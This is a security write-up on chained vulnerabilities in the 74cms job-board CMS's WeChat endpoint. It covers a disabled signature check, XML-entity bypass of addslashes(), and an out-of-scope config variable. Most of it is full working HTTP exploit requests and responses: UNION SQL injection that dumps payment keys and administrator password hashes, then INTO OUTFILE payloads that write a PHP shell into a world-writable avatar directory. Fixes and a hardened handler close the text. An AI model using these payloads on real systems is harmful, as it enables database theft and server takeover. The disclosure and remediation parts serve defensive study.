Multiple vulnerability combinations in server guard CMS (20141027) can cause all data leakage + getshell and Solutions

Source: Internet
Author: User

74cms_v3.5.20.20151127.zip: unrestricted SQL injection. I just obtained 74cms_v3.5.20.20151127.zip, and a diff against the 1020 build shows the following change:

diff -Nurp upload.1020/plus/weixin.php upload.1027/plus/weixin.php--- upload.1020/plus/weixin.php 2014-10-18 12:14:22.000000000 +0800+++ upload.1027/plus/weixin.php 2014-10-25 14:45:22.000000000 +0800@@ -21,10 +21,10 @@ class wechatCallbackapiTest extends mysq     }     public function responseMsg()     {- if(!$this->checkSignature())- {-         exit();-        }+ // if(!$this->checkSignature())+ // {+  //        exit();+  //       }  $postStr = addslashes($GLOBALS["HTTP_RAW_POST_DATA"]);  if (!empty($postStr))  {
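Review bot: The only change in this hunk is to comment out the checkSignature() guard at the top of responseMsg(), so every POST body is now processed without any verification of the caller; the four lines should be restored, and if the check had to be disabled temporarily it belongs behind a configuration switch rather than in a comment, because $postStr is parsed and used immediately below without any other gate.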

 

The call to checkSignature() has been commented out. Why? It is exploited together with two other bugs. Look at the code first:
class wechatCallbackapiTest extends mysql
{
    public function valid()
    {
        $echoStr = $_GET["echostr"];
        if ($this->checkSignature()) {
            exit($echoStr);
        }
    }

    public function responseMsg()
    {
        // if(!$this->checkSignature())
        // {
        //        exit();
        //       }
        // addslashes() runs on the raw body, before XML entities are decoded
        $postStr = addslashes($GLOBALS["HTTP_RAW_POST_DATA"]);
        if (!empty($postStr)) {
            // libxml_disable_entity_loader(true);
            $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);
            $fromUsername = $postObj->FromUserName;   // parsed, entity-decoded value
            $toUsername = $postObj->ToUserName;
            $keyword = trim($postObj->Content);
            $keyword = utf8_to_gbk($keyword);
            $keyword = addslashes($keyword);
            $time = time();
            $event = trim($postObj->Event);
            if ($event === "subscribe") {
                $word = "回复j返回紧急招聘，回复n返回最新招聘！您可以尝试输入职位名称如“会计”，系统将会返回您要找的信息，我们努力打造最人性化的服务平台，谢谢关注。";
                $this->exit_word_message($word, $fromUsername, $toUsername, $time);
            }
            $default_pic = ROOT."/data/images/".DEFAULT_PIC;
            $first_pic = ROOT."/data/images/".FIRST_PIC;
            if ($event === "CLICK") {
                // $_CFG here is not the file-scope global (see the test further down)
                if ($_CFG['weixin_apiopen'] == '0') {
                    $word = "网站微信接口已经关闭";
                    $this->exit_word_message($word, $fromUsername, $toUsername, $time);
                }
                if ($postObj->EventKey == "binding") {
                    $usinfo = $this->get_user_info($fromUsername);
                    if (!empty($usinfo)) {
                        $word = "您已经绑定过了!";
                    } else {
                        $word = "请输入您的账号密码.例如:张三/123456";
                    }
                    $this->exit_word_message($word, $fromUsername, $toUsername, $time);
                }
                ...

    private function get_user_info($fromUsername)
    {
        $usinfo = array();
        // $fromUsername is concatenated straight into the SQL string
        $usinfo_obj = $this->query("select * from ".table('members')." where weixin_openid='".$fromUsername."' limit 1");
        while ($row = $this->fetch_array($usinfo_obj)) {
            $usinfo = $row;
        }
        return $usinfo;
    }

 

$postStr = addslashes($GLOBALS["HTTP_RAW_POST_DATA"]);

 

addslashes() is applied to the whole raw POST body, then:
$postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);
$fromUsername = $postObj->FromUserName;

 

Then:
$usinfo = $this->get_user_info($fromUsername);
===> $this->query("select * from ".table('members')." where weixin_openid='".$fromUsername."' limit 1");

 

$fromUsername goes straight into SQL after simplexml_load_string(). Does addslashes($GLOBALS["HTTP_RAW_POST_DATA"]) solve everything? No, because special characters in XML can also be written as entities, which the parser decodes after addslashes() has already run:

Special character   Meaning                         Entity encoding
>                   greater-than (closes a tag)     &gt;
<                   less-than (opens a tag)         &lt;
"                   quotation mark                  &quot;
'                   apostrophe                      &apos;
&                   ampersand                       &amp;

 

In other words, in XML a single quote can be written as &apos;, and since the post data is not filtered after parsing, arbitrary SQL can be injected: the whole database can be dumped, and even a shell obtained. Some may say the code below is conditional, because $_CFG['weixin_apiopen']=='0' is checked first:
if ($event === "CLICK") {
    if ($_CFG['weixin_apiopen'] == '0') {
        $word = "网站微信接口已经关闭";
        $this->exit_word_message($word, $fromUsername, $toUsername, $time);
    }

 

But is $_CFG['weixin_apiopen'] actually in effect there? The following test tells us:
<?php

$_CFG = 0;

class Test {
    function myprint() {
        echo "$_CFG in class=" . $_CFG;
    }
}

echo "in file =" . $_CFG;
$tt = new Test();
$tt->myprint();
?>

 

Open http://127.0.0.1:8081/74cms/test.php in the browser. The result is:
in file =0
Notice: Undefined variable: _CFG in /var/www/html/74cms/test.php on line 7
Notice: Undefined variable: _CFG in /var/www/html/74cms/test.php on line 7
in class=

 

That is, $_CFG accessed inside a class method is not the file-scope variable; it is simply undefined there. So
$_CFG['weixin_apiopen']=='0'

 

is never true, regardless of whether the WeChat API is enabled in the admin backend. With all the conditions out of the way, injection works directly. For 74cms_v3.5.20.20151127 on a default install, the test looks like this:
POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1
Content-Type: application/xml
User-Agent: http4e/5.0.12
Host: 127.0.0.1:8081
Content-Length: 155

<xml><ToUserName>111</ToUserName><FromUserName>1111&apos;</FromUserName><Content>2222</Content><Event>CLICK</Event><EventKey>binding</EventKey></xml>

HTTP/1.1 200 OK
Date: Wed, 29 Oct 2014 07:33:13 GMT
Server: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4
X-Powered-By: PHP/5.5.18
Set-Cookie: PHPSESSID=2ctd2pnvhip2mpvbs57rlvmq91; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 79
Content-Type: text/html;charset=gb2312

Error：Query error:select * from qs_members where weixin_openid='1111'' limit 1

UNION select:

POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1
Content-Type: application/xml
User-Agent: http4e/5.0.12
Host: 127.0.0.1:8081
Content-Length: 226

<xml><ToUserName>111</ToUserName><FromUserName>1111&apos; union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#</FromUserName><Content>1.1</Content><Event>CLICK</Event><EventKey>binding</EventKey></xml>

HTTP/1.1 200 OK
Date: Wed, 29 Oct 2014 07:36:59 GMT
Server: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4
X-Powered-By: PHP/5.5.18
Set-Cookie: PHPSESSID=3nhpuf9it16ea6omld6h000012; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=gb2312

<xml><ToUserName><![CDATA[1111' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#]]></ToUserName><FromUserName><![CDATA[111]]></FromUserName><CreateTime>1414568219</CreateTime><MsgType><![CDATA[text]]></MsgType><Content><![CDATA[you have already bound it!]]></Content></xml>

 

Get the payment-related key:
POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1
Content-Type: application/xml
User-Agent: http4e/5.0.12
Host: 127.0.0.1:8081
Content-Length: 303

 

<xml><ToUserName>111</ToUserName><FromUserName>1111&apos; union select (select group_concat(id,0x7c,typename,0x7c,ytauthkey,0x5d) from qs_payment),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#</FromUserName><Content>2222</Content><Event>CLICK</Event><EventKey>apply_jobs</EventKey></xml>

 

HTTP/1.1 200 OK
Date: Wed, 29 Oct 2014 07:49:52 GMT
Server: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4
X-Powered-By: PHP/5.5.18
Set-Cookie: PHPSESSID=u4o47rf3pk29shkk433cfompj0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 137
Content-Type: text/html;charset=gb2312

Error：Query error:select * from qs_personal_jobs_apply where personal_uid=1|remittance|],2|chinabank|],3|tenpay|xndcgc],4|alipay|kiohad]

 

The 1|remittance|],2|chinabank|],3|tenpay|xndcgc],4|alipay|kiohad] in the error message is the table's data (id, typename and ytauthkey, joined by the 0x7c and 0x5d separators from the group_concat). Administrator table:
POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1
Content-Type: application/xml
User-Agent: http4e/5.0.12
Host: 127.0.0.1:8081
Content-Length: 303

 

 
<xml><ToUserName>111</ToUserName><FromUserName>1111&apos; union select (select group_concat(admin_name,0x7c,pwd,0x7c,pwd_hash,0x5d) from qs_admin),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#</FromUserName><Content>2222</Content><Event>CLICK</Event><EventKey>apply_jobs</EventKey></xml>

 

HTTP/1.1 200 OK
Date: Wed, 29 Oct 2014 08:09:07 GMT
Server: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4
X-Powered-By: PHP/5.5.18
Set-Cookie: PHPSESSID=dgh5nio4aflji6ppjatq9iee14; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 121
Content-Type: text/html;charset=gb2312

Error：Query error:select * from qs_personal_jobs_apply where personal_uid=admin|81cdc144e960168e163223605e5daeba|taZeD1]

 

Getshell:
POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1
Content-Type: application/xml
User-Agent: http4e/5.0.12
Host: 127.0.0.1:8081
Content-Length: 324

 

<xml><ToUserName>111</ToUserName><FromUserName>1111&apos; union select 0x3C3F70687020706870696E666F28293B3F3E,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 INTO OUTFILE &apos;/var/www/html/74cms/data/shell.php&apos; #</FromUserName><Content>2222</Content><Event>CLICK</Event><EventKey>binding</EventKey></xml>

 

Returned error:
HTTP/1.1 200 OK
Date: Wed, 29 Oct 2014 08:29:11 GMT
Server: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4
X-Powered-By: PHP/5.5.18
Set-Cookie: PHPSESSID=tkimiq88f2v707inhs5avrvbd5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 238
Content-Type: text/html;charset=gb2312

Error：Query error:select * from qs_members where weixin_openid='1111' union select 0x3C3F70687020706870696E666F28293B3F3E,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 INTO OUTFILE '/var/www/html/74cms/data/shell.php' #' limit 1
This fails because writing shell.php requires write permission on the target directory, and the data directory does not grant it. A writable directory can still be found: registering an ordinary user and uploading an avatar creates a directory with 0777 permissions, data/avatar/100, so the shell is written there instead:
POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1
Content-Type: application/xml
User-Agent: http4e/5.0.12
Host: 127.0.0.1:8081
Content-Length: 340

 

<xml><ToUserName>111</ToUserName><FromUserName>1111&apos; union select 0x3C3F70687020706870696E666F28293B3F3E,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 INTO OUTFILE &apos;/var/www/html/74cms/data/avatar/100/2014/shell.php&apos; #</FromUserName><Content>2222</Content><Event>CLICK</Event><EventKey>binding</EventKey></xml>

 

HTTP/1.1 200 OK
Date: Wed, 29 Oct 2014 08:25:09 GMT
Server: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4
X-Powered-By: PHP/5.5.18
Set-Cookie: PHPSESSID=8m121t281t85udkja8rt8ub147; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 448
Content-Type: text/html;charset=gb2312

<xml><ToUserName><![CDATA[1111' union select 0x3C3F70687020706870696E666F28293B3F3E,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 into outfile '/var/www/html/74cms/data/avatar/100/2014/shell.php' #]]></ToUserName><FromUserName><![CDATA[111]]></FromUserName><CreateTime>1414571109</CreateTime><MsgType><![CDATA[text]]></MsgType><Content><![CDATA[enter your account and password. For example, Michael Jacob/123456]]></Content></xml>

 

Browser access: http://127.0.0.1:8081/74cms/data/avatar/100/2014/shell.php
Solution:
1. Why was checkSignature() made optional? It must stay required.
2. if($_CFG['weixin_apiopen']=='0') is never true inside the class; define("apiopen", $_CFG['weixin_apiopen']) at file scope and test the constant instead.
3. Apply addslashes() to each element of $postObj before it is used.
4. The upload directory for avatar images does not need 0777 permissions.
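As an added illustration of fixes 1 to 3 (my code, not 74cms's): the handler below keeps the signature check mandatory, imports $_CFG into method scope, and binds the parsed FromUserName as a query parameter, which is stronger than the per-element addslashes() of fix 3 and is not bypassed by the &apos; trick above. It assumes PHP 7.1+, a mysqli connection in $db, a hypothetical $_CFG['weixin_token'] holding the token registered at WeChat, and the standard WeChat signature (sha1 over the string-sorted token, timestamp and nonce).

```php
<?php
// Added example, not 74cms code; PHP 7.1+. Assumes a mysqli connection in $db
// and a hypothetical $_CFG['weixin_token'] holding the token registered at WeChat.
class HardenedWeixinHandler
{
    private $db;
    public function __construct(mysqli $db) { $this->db = $db; }
    // Fix 1: signature check is mandatory. WeChat signs every call with
    // sha1 over the string-sorted token, timestamp and nonce.
    public function checkSignature(array $q, string $token): bool
    {
        if (!isset($q['signature'], $q['timestamp'], $q['nonce'])) return false;
        $parts = array($token, $q['timestamp'], $q['nonce']);
        sort($parts, SORT_STRING);
        return hash_equals(sha1(implode($parts)), (string)$q['signature']);
    }
    // Fix 2: $_CFG lives at file scope; without "global" it is undefined in a
    // method, which is why the original '0' comparison could never be true.
    public function apiClosed(): bool
    {
        global $_CFG;
        return (string)($_CFG['weixin_apiopen'] ?? '0') === '0';
    }
    // Fix 3: addslashes() on the raw body never sees &apos; because the XML
    // parser decodes it afterwards, so bind the parsed value as a parameter.
    public function getUserInfo(string $openid): ?array
    {
        $stmt = $this->db->prepare('SELECT * FROM qs_members WHERE weixin_openid = ? LIMIT 1');
        $stmt->bind_param('s', $openid);
        $stmt->execute();
        $row = $stmt->get_result()->fetch_assoc();   // get_result() needs mysqlnd
        $stmt->close();
        return $row ?: null;
    }
    public function responseMsg(string $rawBody, array $q): ?array
    {
        global $_CFG;
        if (!$this->checkSignature($q, $_CFG['weixin_token'])) return null;
        if ($this->apiClosed()) return null;           // now actually reachable
        $post = simplexml_load_string($rawBody, 'SimpleXMLElement', LIBXML_NOCDATA);
        if ($post === false) return null;
        return $this->getUserInfo((string)$post->FromUserName); // decoded, then bound
    }
}

// Constructed demo input: the entity decodes to a quote, but it is bound, not concatenated.
$_CFG = array('weixin_apiopen' => '1', 'weixin_token' => 'demo-token');
$body = '<xml><FromUserName>1111&apos; union select 1#</FromUserName></xml>';
```

With a correctly signed query string, responseMsg($body, $_GET) looks up the literal string "1111' union select 1#" and returns null, rather than running the injected SQL.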
